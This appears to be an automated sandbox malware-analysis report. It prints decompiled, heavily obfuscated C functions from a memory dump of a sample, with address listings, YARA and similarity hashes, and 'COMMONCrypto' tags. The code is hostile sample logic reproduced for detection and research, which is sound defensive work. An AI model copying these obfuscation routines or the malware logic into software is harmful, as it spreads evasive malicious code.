				_v32 = _v32 ^ 0x69defe02;
				_v8 = 0x6622;
				_t188 = 0x62;
				_v8 = _v8 / _t188;
				_v8 = _v8 ^ 0x00007651;
				_v36 = 0x9705;
				_t189 = 0x5a;
				_v36 = _v36 * 0x11;
				_v36 = _v36 / _t189;
				_v36 = _v36 | 0xcd876993;
				_v36 = _v36 ^ 0xcd872ff9;
				_v40 = 0x44cf;
				_v40 = _v40 | 0x3f74ab7e;
				_v40 = _v40 << 1;
				_v40 = _v40 + 0x396f;
				_v40 = _v40 ^ 0x7eea1d0a;
				_v4 = E00238C8F(_t189);
				_t217 = _v28 + E00238C8F(_t189) % _v52;
				_t184 = _v20 + E00238C8F(_v52) % _v44;
				if(_t217 != 0) {
					_t211 = _t215;
					_t194 = _t217 >> 1;
					_t215 = _t215 + _t217 * 2;
					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
					asm("adc ecx, ecx");
					memset(_t211 + _t194, _t181, 0);
				}
				E0022D6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
				 *((short*)(_t215 + _t184 * 2)) = 0;
				return 0;
			}




























                                              0x002283a0
                                              0x002283aa
                                              0x002283b2
                                              0x002283b7
                                              0x002283bf
                                              0x002283d1
                                              0x002283d5
                                              0x002283dc
                                              0x002283df
                                              0x002283e3
                                              0x002283e8
                                              0x002283f0
                                              0x002283fd
                                              0x00228401
                                              0x00228406
                                              0x0022840e
                                              0x00228416
                                              0x0022841e
                                              0x00228426
                                              0x0022842e
                                              0x00228436
                                              0x0022843e
                                              0x00228446
                                              0x0022844e
                                              0x00228456
                                              0x0022845e
                                              0x00228466
                                              0x0022846e
                                              0x00228476
                                              0x0022847e
                                              0x00228483
                                              0x00228490
                                              0x00228494
                                              0x0022849c
                                              0x002284a8
                                              0x002284ad
                                              0x002284b3
                                              0x002284bb
                                              0x002284c3
                                              0x002284cb
                                              0x002284d0
                                              0x002284d8
                                              0x002284e0
                                              0x002284e8
                                              0x002284f0
                                              0x002284f8
                                              0x00228500
                                              0x00228508
                                              0x00228510
                                              0x00228515
                                              0x0022851d
                                              0x00228525
                                              0x00228531
                                              0x00228536
                                              0x0022853c
                                              0x00228544
                                              0x00228551
                                              0x00228552
                                              0x0022855c
                                              0x00228560
                                              0x00228568
                                              0x00228570
                                              0x00228578
                                              0x00228580
                                              0x00228584
                                              0x0022858c
                                              0x002285a1
                                              0x002285c2
                                              0x002285d9
                                              0x002285dd
                                              0x002285e2
                                              0x002285e4
                                              0x002285e6
                                              0x002285ee
                                              0x002285f0
                                              0x002285f2
                                              0x002285f5
                                              0x0022860f
                                              0x00228619
                                              0x00228623

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: BQ{*$H'$KB$Qv$o9
                                              • API String ID: 0-3657823386
                                              • Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
                                              • Instruction ID: 20f26d3c78a4ea20b3dc069de4c70fd5cc2c423dacfc5429715945137b21287d
                                              • Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
                                              • Instruction Fuzzy Hash: 126111701093419FD348CF25D58A50BBBE1FBC8748F409A1DF1DA96260D7B9DA198F86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00225B79, Relevance: 5.2, Strings: 4, Instructions: 219COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E00225B79(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _t203;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t216;
				intOrPtr _t220;
				intOrPtr _t224;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;

				_t215 = __ecx;
				_t253 =  &_v116;
				_v20 = __edx;
				_v32 = __ecx;
				_v12 = 0xafae1;
				_v4 = 0;
				_v8 = 0x46e7c7;
				_v100 = 0x4e85;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0xa122;
				_v100 = _v100 ^ 0x0000ef7f;
				_v76 = 0x276c;
				_v76 = _v76 + 0xa4ad;
				_v76 = _v76 ^ 0x0000a5d4;
				_v116 = 0xc292;
				_v36 = 0;
				_v116 = _v116 * 0x3d;
				_t243 = 0x5ac7f3d;
				_v116 = _v116 << 0xc;
				_t246 = 0x1a;
				_v116 = _v116 / _t246;
				_v116 = _v116 ^ 0x08d6c610;
				_v96 = 0x57a;
				_v96 = _v96 << 4;
				_v96 = _v96 + 0xde71;
				_v96 = _v96 ^ 0x000109c0;
				_v108 = 0xf9e9;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 + 0xffffa4d5;
				_t247 = 0x1e;
				_v108 = _v108 * 0x3c;
				_v108 = _v108 ^ 0xffeac835;
				_v112 = 0x3502;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 + 0xffffe509;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x0003f015;
				_v64 = 0x4162;
				_v64 = _v64 + 0xffff06ec;
				_v64 = _v64 ^ 0xffff0d41;
				_v68 = 0x29f6;
				_v68 = _v68 | 0xa40114db;
				_v68 = _v68 ^ 0xa4015458;
				_v72 = 0x8ebc;
				_v72 = _v72 | 0xb773f5bd;
				_v72 = _v72 ^ 0xb773df20;
				_v52 = 0x199c;
				_v52 = _v52 + 0x59c9;
				_v52 = _v52 ^ 0x00005d96;
				_v56 = 0x9de2;
				_v56 = _v56 | 0x18b104fc;
				_v56 = _v56 ^ 0x18b18c09;
				_v60 = 0xcf04;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0000237a;
				_v92 = 0x847f;
				_v92 = _v92 / _t247;
				_v92 = _v92 + 0xfffff45a;
				_v92 = _v92 ^ 0xffffeb4a;
				_v104 = 0x72c3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 + 0xffffb2c0;
				_v104 = _v104 ^ 0xffff9126;
				_v48 = 0x26a;
				_t248 = 0x5f;
				_v48 = _v48 / _t248;
				_v48 = _v48 ^ 0x00002d62;
				_v88 = 0x3bd5;
				_v88 = _v88 | 0xeefd350a;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x777ec4bd;
				_v44 = 0x124c;
				_v44 = _v44 + 0xffff1b1d;
				_v44 = _v44 ^ 0xffff4aeb;
				_v80 = 0x5ade;
				_t249 = 0x3c;
				_t252 = _v20;
				_t214 = _v20;
				_v80 = _v80 * 0x3a;
				_v80 = _v80 + 0xffff943f;
				_v80 = _v80 ^ 0x0014640e;
				_v84 = 0x6f1d;
				_t250 = _v16;
				_v84 = _v84 / _t249;
				_v84 = _v84 * 0x74;
				_v84 = _v84 ^ 0x0000fa63;
				_t199 = _v40;
				while(_t243 != 0x5ac7f3d) {
					if(_t243 == 0x17993a65) {
						_t216 = E0023023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
						_t253 =  &(_t253[5]);
						_v36 = _t216;
						if(_t216 == 0) {
							_t244 = _v36;
							goto L19;
						} else {
							_t220 = _v28;
							if(_t220 == 0) {
								goto L15;
							} else {
								_t199 = _v40 + _t220;
								_v40 = _v40 + _t220;
								_t252 = _t252 - _t220;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t224 = _t250 + _t250;
									_push(_t224);
									_push(_t224);
									_v24 = _t224;
									_t245 = E00228736(_t224);
									if(_t245 == 0) {
										goto L15;
									} else {
										E00232674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
										E0022F536(_v104, _v48, _v88, _t214);
										_t252 = _t250;
										_t199 = _t245 + _t250;
										_t250 = _v24;
										_t253 =  &(_t253[7]);
										_v40 = _t199;
										_t214 = _t245;
										if(_t252 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t243 != 0x1ebe7f62) {
							L14:
							if(_t243 != 0x20fb0f57) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t215);
							_push(_t215);
							_t199 = E00228736(0x10000);
							_t214 = _t199;
							if(_t214 == 0) {
								L15:
								_t244 = _v36;
								if(_t244 == 0) {
									L19:
									E0022F536(_v44, _v80, _v84, _t214);
								} else {
									_t203 = _v20;
									 *_t203 = _t214;
									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
								}
							} else {
								_v40 = _t199;
								_t252 = 0x10000;
								L6:
								_t215 = _v32;
								_t243 = 0x17993a65;
								continue;
							}
						}
					}
					return _t244;
				}
				_t243 = 0x1ebe7f62;
				goto L14;
			}
















































                                              0x00225b79
                                              0x00225b79
                                              0x00225b80
                                              0x00225b84
                                              0x00225b88
                                              0x00225b92
                                              0x00225b99
                                              0x00225ba1
                                              0x00225ba9
                                              0x00225bae
                                              0x00225bb6
                                              0x00225bbe
                                              0x00225bc6
                                              0x00225bce
                                              0x00225bd6
                                              0x00225bde
                                              0x00225be7
                                              0x00225beb
                                              0x00225bf0
                                              0x00225bfd
                                              0x00225c02
                                              0x00225c08
                                              0x00225c10
                                              0x00225c18
                                              0x00225c1d
                                              0x00225c25
                                              0x00225c2d
                                              0x00225c35
                                              0x00225c3a
                                              0x00225c47
                                              0x00225c48
                                              0x00225c4c
                                              0x00225c54
                                              0x00225c5c
                                              0x00225c61
                                              0x00225c69
                                              0x00225c6e
                                              0x00225c76
                                              0x00225c7e
                                              0x00225c86
                                              0x00225c8e
                                              0x00225c96
                                              0x00225c9e
                                              0x00225ca6
                                              0x00225cae
                                              0x00225cb6
                                              0x00225cbe
                                              0x00225cc6
                                              0x00225cce
                                              0x00225cd6
                                              0x00225cde
                                              0x00225ce6
                                              0x00225cee
                                              0x00225cf6
                                              0x00225cfb
                                              0x00225d03
                                              0x00225d11
                                              0x00225d15
                                              0x00225d1d
                                              0x00225d25
                                              0x00225d32
                                              0x00225d36
                                              0x00225d3b
                                              0x00225d43
                                              0x00225d4d
                                              0x00225d5b
                                              0x00225d60
                                              0x00225d66
                                              0x00225d6e
                                              0x00225d76
                                              0x00225d7e
                                              0x00225d82
                                              0x00225d8a
                                              0x00225d92
                                              0x00225d9a
                                              0x00225da2
                                              0x00225daf
                                              0x00225db0
                                              0x00225db4
                                              0x00225db8
                                              0x00225dbc
                                              0x00225dc4
                                              0x00225dcc
                                              0x00225dda
                                              0x00225dde
                                              0x00225de7
                                              0x00225deb
                                              0x00225df3
                                              0x00225df7
                                              0x00225e09
                                              0x00225e66
                                              0x00225e68
                                              0x00225e6b
                                              0x00225e71
                                              0x00225f29
                                              0x00000000
                                              0x00225e77
                                              0x00225e77
                                              0x00225e7d
                                              0x00000000
                                              0x00225e83
                                              0x00225e87
                                              0x00225e89
                                              0x00225e8d
                                              0x00225e8f
                                              0x00000000
                                              0x00225e91
                                              0x00225e95
                                              0x00225ea0
                                              0x00225ea1
                                              0x00225ea2
                                              0x00225eab
                                              0x00225eb1
                                              0x00000000
                                              0x00225eb3
                                              0x00225ec6
                                              0x00225ed8
                                              0x00225edd
                                              0x00225edf
                                              0x00225ee2
                                              0x00225ee9
                                              0x00225eec
                                              0x00225ef0
                                              0x00225ef4
                                              0x00000000
                                              0x00225ef6
                                              0x00000000
                                              0x00225ef6
                                              0x00225ef4
                                              0x00225eb1
                                              0x00225e8f
                                              0x00225e7d
                                              0x00225e0b
                                              0x00225e11
                                              0x00225f00
                                              0x00225f06
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00225e17
                                              0x00225e1b
                                              0x00225e28
                                              0x00225e29
                                              0x00225e2c
                                              0x00225e31
                                              0x00225e37
                                              0x00225f0c
                                              0x00225f0c
                                              0x00225f12
                                              0x00225f2d
                                              0x00225f3a
                                              0x00225f14
                                              0x00225f14
                                              0x00225f1a
                                              0x00225f1c
                                              0x00225f1c
                                              0x00225e3d
                                              0x00225e3d
                                              0x00225e41
                                              0x00225e43
                                              0x00225e43
                                              0x00225e47
                                              0x00000000
                                              0x00225e47
                                              0x00225e37
                                              0x00225e11
                                              0x00225f28
                                              0x00225f28
                                              0x00225efb
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: b-$bA$l'$z#
                                              • API String ID: 0-3285866504
                                              • Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                              • Instruction ID: d6f77bac02784d7b8fef3fa3db782234c26f73a2cc4e995b2c0cc5498abdf5f8
                                              • Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                              • Instruction Fuzzy Hash: 27A141B1518782AFD364CF69D48980FBBE1FBC4718F508A1DF5958A260D7B4DA098F83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002280BA, Relevance: 5.1, Strings: 4, Instructions: 138COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E002280BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t96;
				signed int _t110;
				signed int _t115;
				void* _t118;
				intOrPtr* _t132;
				signed int* _t133;
				signed int* _t136;

				_t133 = _a8;
				_push(_t133);
				_push(_a4);
				_t132 = __ecx;
				_push(__ecx);
				E0022602B(_t96);
				_v96 = 0xfd71;
				_t136 =  &(( &_v124)[4]);
				_v96 = _v96 >> 3;
				_v96 = _v96 ^ 0x00001ccd;
				_t118 = 0x30cb7a4b;
				_v120 = 0xdf4c;
				_t115 = 3;
				_v120 = _v120 * 0xb;
				_v120 = _v120 << 0xb;
				_v120 = _v120 ^ 0x4cc20427;
				_v100 = 0xc552;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x0001a6ce;
				_v124 = 0x18f9;
				_v124 = _v124 ^ 0xb394f6a4;
				_v124 = _v124 | 0xdedfeaf6;
				_v124 = _v124 ^ 0xffdfdfcb;
				_v104 = 0x111;
				_v104 = _v104 / _t115;
				_v104 = _v104 ^ 0x000052be;
				_v108 = 0x5c9e;
				_v108 = _v108 * 0x3f;
				_v108 = _v108 ^ 0x0016b186;
				_v112 = 0xa32c;
				_v112 = _v112 << 3;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000047d3;
				_v116 = 0x4558;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0dcfa8f2;
				_v116 = _v116 ^ 0x0dcf9328;
				_v92 = 0xa46a;
				_v92 = _v92 | 0x10f37349;
				_v92 = _v92 ^ 0x10f3c95f;
				_v80 = 0x75fc;
				_v80 = _v80 | 0x150fa2b7;
				_v80 = _v80 ^ 0x150fb0d6;
				_v84 = 0x120;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x00001616;
				_v88 = 0x286e;
				_v88 = _v88 * 0x36;
				_v88 = _v88 ^ 0x0008f8fa;
				do {
					while(_t118 != 0x75fb138) {
						if(_t118 == 0xe7893d9) {
							E0023360F( &_v76, _v112, _v116,  *_t132, _v92);
							_t136 =  &(_t136[3]);
							_t118 = 0x75fb138;
							continue;
						} else {
							if(_t118 == 0xf76409b) {
								_push(_t118);
								_push(_t118);
								_t110 = E00228736(_t133[1]);
								 *_t133 = _t110;
								__eflags = _t110;
								if(__eflags != 0) {
									_t118 = 0x11f2e7ae;
									continue;
								}
							} else {
								if(_t118 == 0x11f2e7ae) {
									E002350F2( &_v76, _v124, _v104, _v108, _t133);
									_t136 =  &(_t136[3]);
									_t118 = 0xe7893d9;
									continue;
								} else {
									if(_t118 == 0x25eae02b) {
										_t133[1] = E002361B8(_t132);
										_t118 = 0xf76409b;
										continue;
									} else {
										if(_t118 != 0x30cb7a4b) {
											goto L14;
										} else {
											 *_t133 = 0;
											_t118 = 0x25eae02b;
											_t133[1] = 0;
											continue;
										}
									}
								}
							}
						}
						goto L15;
					}
					E00227998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
					_t136 =  &(_t136[3]);
					_t118 = 0x2f2a8f34;
					L14:
					__eflags = _t118 - 0x2f2a8f34;
				} while (__eflags != 0);
				L15:
				__eflags =  *_t133;
				_t95 =  *_t133 != 0;
				__eflags = _t95;
				return 0 | _t95;
			}























                                              0x002280c0
                                              0x002280c8
                                              0x002280c9
                                              0x002280d0
                                              0x002280d3
                                              0x002280d4
                                              0x002280d9
                                              0x002280e1
                                              0x002280e4
                                              0x002280eb
                                              0x002280f3
                                              0x002280f8
                                              0x0022810c
                                              0x0022810d
                                              0x00228111
                                              0x00228116
                                              0x0022811e
                                              0x00228126
                                              0x0022812a
                                              0x00228132
                                              0x0022813a
                                              0x00228142
                                              0x0022814a
                                              0x00228152
                                              0x00228160
                                              0x00228164
                                              0x0022816c
                                              0x00228179
                                              0x0022817d
                                              0x00228185
                                              0x0022818d
                                              0x00228192
                                              0x00228197
                                              0x0022819f
                                              0x002281a7
                                              0x002281ac
                                              0x002281b4
                                              0x002281bc
                                              0x002281c4
                                              0x002281cc
                                              0x002281d4
                                              0x002281dc
                                              0x002281e4
                                              0x002281ec
                                              0x002281f4
                                              0x002281f9
                                              0x00228201
                                              0x0022820e
                                              0x00228212
                                              0x0022821c
                                              0x0022821c
                                              0x0022822e
                                              0x002282c8
                                              0x002282cd
                                              0x002282d0
                                              0x00000000
                                              0x00228234
                                              0x0022823a
                                              0x0022829d
                                              0x0022829e
                                              0x002282a2
                                              0x002282a7
                                              0x002282ab
                                              0x002282ad
                                              0x002282af
                                              0x00000000
                                              0x002282af
                                              0x0022823c
                                              0x0022823e
                                              0x00228282
                                              0x00228287
                                              0x0022828a
                                              0x00000000
                                              0x00228240
                                              0x00228246
                                              0x00228267
                                              0x0022826a
                                              0x00000000
                                              0x00228248
                                              0x0022824e
                                              0x00000000
                                              0x00228254
                                              0x00228254
                                              0x00228256
                                              0x0022825b
                                              0x00000000
                                              0x0022825b
                                              0x0022824e
                                              0x00228246
                                              0x0022823e
                                              0x0022823a
                                              0x00000000
                                              0x0022822e
                                              0x002282ef
                                              0x002282f4
                                              0x002282f7
                                              0x002282fc
                                              0x002282fc
                                              0x002282fc
                                              0x00228309
                                              0x0022830b
                                              0x0022830f
                                              0x0022830f
                                              0x00228316

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: +%$+%$XE$n(
                                              • API String ID: 0-3838449085
                                              • Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                              • Instruction ID: f775f9b0f0e2b2d845c6ae3378dd91cf4e98b52292c6e692ffcfee8cce7138b7
                                              • Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                              • Instruction Fuzzy Hash: 4751667010A742AFD358DF60D88982BBBE1BF84348F505A1DF58696261DBB1CA59CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00238D1C, Relevance: 5.1, Strings: 4, Instructions: 123COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E00238D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t108;
				intOrPtr _t110;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t147;

				_v36 = 0x4ef4;
				_v36 = _v36 + 0xa860;
				_v36 = _v36 | 0x1c77c6a8;
				_t121 = 0x2a;
				_v36 = _v36 / _t121;
				_v36 = _v36 ^ 0x00adf3e3;
				_v16 = 0xcfa4;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x33e94134;
				_v24 = 0x2a39;
				_v24 = _v24 ^ 0x66b190f2;
				_v24 = _v24 + 0x3fe;
				_v24 = _v24 ^ 0x66b19dc3;
				_v12 = 0x275a;
				_v12 = _v12 ^ 0xee83f1bc;
				_v12 = _v12 ^ 0xee83c69b;
				_v20 = 0x82c0;
				_v20 = _v20 | 0x74e44d6f;
				_v20 = _v20 ^ 0xeca8f7fc;
				_v20 = _v20 ^ 0x984c40be;
				_v32 = 0xcbb2;
				_v32 = _v32 ^ 0xf8a1ef7c;
				_t122 = 0x26;
				_v32 = _v32 / _t122;
				_v32 = _v32 ^ 0xc0a4f16a;
				_v32 = _v32 ^ 0xc62e2f9a;
				_v28 = 0xce4d;
				_t123 = 0x68;
				_v28 = _v28 / _t123;
				_t124 = 0xf;
				_v28 = _v28 / _t124;
				_v28 = _v28 ^ 0x15eb9a2e;
				_v28 = _v28 ^ 0x15ebc86f;
				_v4 = 0x1911;
				_v4 = _v4 ^ 0x7b1b0330;
				_v4 = _v4 ^ 0x7b1b2d08;
				_v8 = 0x92f;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00005602;
				_t108 = E002385BA(_t124);
				_t144 = _a4;
				_t146 = _t108;
				_v36 = 0x94f3;
				_v36 = _v36 + 0xffff06f8;
				_v36 = _v36 | 0xf59d433d;
				_v36 = _v36 >> 0xe;
				_t148 = _t144 + 0x24;
				_v36 = _v36 ^ 0x0003ffff;
				_t120 = E0022E29C(_v16, _v24, _t144 + 0x24);
				_t110 =  *((intOrPtr*)(_t144 + 8));
				if(_t110 != _v36 && _t110 != _t146) {
					_t127 =  *((intOrPtr*)(_t144 + 0x18));
					if(_t127 != _v36 && _t127 != _t146) {
						_t145 = _a8;
						_t128 =  *_t145;
						if(E00238D05(_t128, _t120) == 0) {
							_push(_t128);
							_push(_t128);
							_t147 = E00228736(0x224);
							if(_t147 != 0) {
								_t95 = _t147 + 0xc; // 0xc
								E00226636(_t95, _v28, _v4, _v8, _t148);
								 *_t147 = _t120;
								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
								 *_t145 = _t147;
							}
						}
					}
				}
				return 1;
			}

























                                              0x00238d1f
                                              0x00238d28
                                              0x00238d2f
                                              0x00238d3f
                                              0x00238d44
                                              0x00238d4a
                                              0x00238d52
                                              0x00238d5a
                                              0x00238d5f
                                              0x00238d67
                                              0x00238d6f
                                              0x00238d77
                                              0x00238d7f
                                              0x00238d87
                                              0x00238d8f
                                              0x00238d97
                                              0x00238d9f
                                              0x00238da7
                                              0x00238daf
                                              0x00238db7
                                              0x00238dbf
                                              0x00238dc7
                                              0x00238dd3
                                              0x00238dd8
                                              0x00238dde
                                              0x00238de6
                                              0x00238dee
                                              0x00238dfa
                                              0x00238dff
                                              0x00238e09
                                              0x00238e0c
                                              0x00238e10
                                              0x00238e18
                                              0x00238e20
                                              0x00238e28
                                              0x00238e30
                                              0x00238e38
                                              0x00238e40
                                              0x00238e45
                                              0x00238e51
                                              0x00238e56
                                              0x00238e5a
                                              0x00238e5c
                                              0x00238e64
                                              0x00238e6c
                                              0x00238e74
                                              0x00238e79
                                              0x00238e7c
                                              0x00238e92
                                              0x00238e94
                                              0x00238e9c
                                              0x00238ea2
                                              0x00238ea9
                                              0x00238eaf
                                              0x00238eb5
                                              0x00238ebe
                                              0x00238ecc
                                              0x00238ecd
                                              0x00238ed8
                                              0x00238ede
                                              0x00238ee5
                                              0x00238ef0
                                              0x00238ef5
                                              0x00238efc
                                              0x00238f02
                                              0x00238f02
                                              0x00238ede
                                              0x00238ebe
                                              0x00238ea9
                                              0x00238f0e

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: /$4A3$9*$oMt
                                              • API String ID: 0-1186868077
                                              • Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                              • Instruction ID: 0a16274f2c4661f6b1bc49b322e46626a5471621d82d84454cb02992b481d9fc
                                              • Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                              • Instruction Fuzzy Hash: 2E5156B16083429FD358CF25D48A90BFBE1FB98718F204A1CF49596260C7B4DA59CF86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00222A30, Relevance: 5.1, Strings: 4, Instructions: 108COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00222A30(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v124;
				void* _t120;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				intOrPtr _t146;

				_v12 = 0xa0d7;
				_v12 = _v12 + 0x7eb;
				_v12 = _v12 + 0xffff9690;
				_t130 = 0x70;
				_v12 = _v12 / _t130;
				_v12 = _v12 ^ 0x00005cb7;
				_v36 = 0xa6e2;
				_t131 = 0x7c;
				_t146 = _a4;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 ^ 0x00462f2b;
				_v20 = 0xf5ce;
				_v20 = _v20 + 0xec5e;
				_v20 = _v20 | 0x882d1c6f;
				_v20 = _v20 ^ 0x882decee;
				_v8 = 0xef73;
				_v8 = _v8 * 0x50;
				_v8 = _v8 ^ 0x984778b6;
				_v8 = _v8 | 0x0acb781a;
				_v8 = _v8 ^ 0x9acfaccf;
				_v16 = 0xf20c;
				_t132 = 0x6d;
				_v16 = _v16 / _t131;
				_v16 = _v16 | 0x2a1cc570;
				_v16 = _v16 * 0x5c;
				_v16 = _v16 ^ 0x225769f1;
				_v28 = 0xd318;
				_v28 = _v28 / _t132;
				_v28 = _v28 ^ 0x955bcf9a;
				_v28 = _v28 ^ 0x955bcc47;
				_v40 = 0xc2b8;
				_v40 = _v40 + 0x609d;
				_v40 = _v40 ^ 0x00014342;
				_v24 = 0x21cc;
				_v24 = _v24 << 5;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x10e64576;
				_v48 = 0xc8ed;
				_v48 = _v48 + 0xffffe729;
				_v48 = _v48 ^ 0x00009812;
				_v32 = 0xdf82;
				_v32 = _v32 ^ 0xa0cf88d1;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0a0ce5c9;
				_v44 = 0xf2d1;
				_v44 = _v44 + 0x3831;
				_v44 = _v44 ^ 0x00011e20;
				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
				_t149 = _t120;
				if(_t120 != 0) {
					E00232349(_v12, _v36, _v20, _v8, _t132);
					_v60 =  &_v124;
					_v56 = E0022F85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
					E00232025(_v48, _v56, _v32, _v44);
				}
				return 0;
			}























                                              0x00222a36
                                              0x00222a3f
                                              0x00222a46
                                              0x00222a53
                                              0x00222a58
                                              0x00222a5d
                                              0x00222a64
                                              0x00222a6f
                                              0x00222a72
                                              0x00222a75
                                              0x00222a78
                                              0x00222a7f
                                              0x00222a86
                                              0x00222a8d
                                              0x00222a94
                                              0x00222a9b
                                              0x00222aa6
                                              0x00222aa9
                                              0x00222ab0
                                              0x00222ab7
                                              0x00222abe
                                              0x00222aca
                                              0x00222acb
                                              0x00222ad0
                                              0x00222adf
                                              0x00222ae2
                                              0x00222ae9
                                              0x00222af5
                                              0x00222af8
                                              0x00222aff
                                              0x00222b06
                                              0x00222b0d
                                              0x00222b14
                                              0x00222b1b
                                              0x00222b22
                                              0x00222b26
                                              0x00222b2a
